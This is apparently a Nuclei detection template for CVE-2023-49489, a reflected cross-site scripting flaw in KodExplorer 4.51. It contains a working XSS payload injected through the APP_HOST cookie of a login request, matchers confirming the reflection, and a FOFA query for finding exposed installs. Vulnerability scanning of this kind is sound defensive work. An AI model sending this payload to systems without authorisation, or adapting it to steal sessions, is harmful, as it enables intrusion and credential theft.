id: CVE-2023-49489

info:
  name: KodeExplorer 4.51 - Reflective Cross Site Scripting (XSS)
  author: DhiyaneshDk
  severity: medium
  description: |
    Reflective Cross Site Scripting (XSS) vulnerability in KodExplorer version 4.51, allows attackers to obtain sensitive information and escalate privileges via the APP_HOST parameter at config/i18n/en/main.php.
  impact: |
    Unauthenticated attackers can inject malicious JavaScript via reflected XSS in the APP_HOST cookie parameter, potentially stealing user credentials or session cookies.
  remediation: |
    Update KodExplorer to a version newer than 4.51 that addresses the XSS vulnerability.
  reference:
    - https://github.com/kalcaddle/KodExplorer/issues/526
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-49489
    cwe-id: CWE-79
    epss-score: 0.00802
    epss-percentile: 0.74605
    cpe: cpe:2.3:a:kodcloud:kodexplorer:4.51:*:*:*:*:*:*:*
  metadata:
    vendor: kodcloud
    product: kodexplorer
    fofa-query: app="powered-by-kodexplorer"
  tags: cve,cve2023,kodexplorer,xss,vuln

http:
  - raw:
      - |
        GET /index.php?user/login HTTP/1.1
        Host: {{Hostname}}
        Cookie: APP_HOST={{RootURL}}/"><ScRiPt%20>alert(document.domain)</ScRiPt>

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<ScRiPt >alert(document.domain)</ScRiPt>"
          - "KodExplorer"
        condition: and

      - type: word
        part: header
        words:
          - "text/html"
# digest: 490a0046304402204e740f4055738dcda5cb6084fe3e05a1390b11621e7541cf1ab1a12db50c4ee7022024ff00e2e92983692e54eb08d618428853aae76f7833258347fd5095550ce7dc:922c64590222798bb761d5b6d8e72950